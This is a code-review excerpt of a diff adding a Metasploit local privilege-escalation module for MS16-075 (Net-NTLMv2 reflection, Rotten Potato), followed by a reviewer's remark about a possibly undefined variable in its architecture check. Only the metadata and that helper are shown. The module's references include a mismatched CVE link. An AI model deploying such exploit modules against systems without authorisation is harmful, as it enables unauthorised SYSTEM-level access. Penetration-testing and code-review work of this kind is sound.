modules/exploits/windows/local/ms16_075_reflection.rb

```diff
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/reflective_dll_injection'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'Windows Net-NTLMv2 Reflection DCOM/RPC',
+      'Description'    => %q{
+        Module utilizes the Net-NTLMv2 reflection between DCOM/RPC
+        to achieve a SYSTEM handle for elevation of privilege. Currently the module
+        does not spawn as SYSTEM, however once achieving a shell, one can easily
+        use incognito to impersonate the token.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'FoxGloveSec', # the original Potato exploit
+          'breenmachine', # Rotten Potato NG!
+          'Mumbai' # Austin : port of RottenPotato for reflection & quick module
+        ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'none',
+          'WfsDelay' => '20',
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+      'Payload'         =>
+        {
+          'DisableNops' => true
+        },
+      'References'      =>
+        [
+          ['MSB', 'MS16-075'],
+          ['CVE', '2016-3225'],
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
+          ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
+          ['URL', 'https://github.com/breenmachine/RottenPotatoNG']
+        ],
+      'DisclosureDate' => 'Jan 16 2016',
+      'DefaultTarget'  => 0
+    }))
+  end
+
+  def check_arch
+    os = sysinfo["OS"]
+
+    if sysinfo["Architecture"] =~ /(wow|x)64/i
+      if session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"] == "\x00\x00\x00\x00"
+        arch = ARCH_X64
+      else
+        arch = ARCH_X86
+      end
+    elsif sysinfo["Architecture"] == ARCH_X86
+      arch = ARCH_X86
+    end
+
+    return arch
```

Comment:
In theory, `arch` could be undefined here. Or, more specifically, `arch` will be `arch` from the global scope. Not sure if that's intended...

Reply:
unintended entirely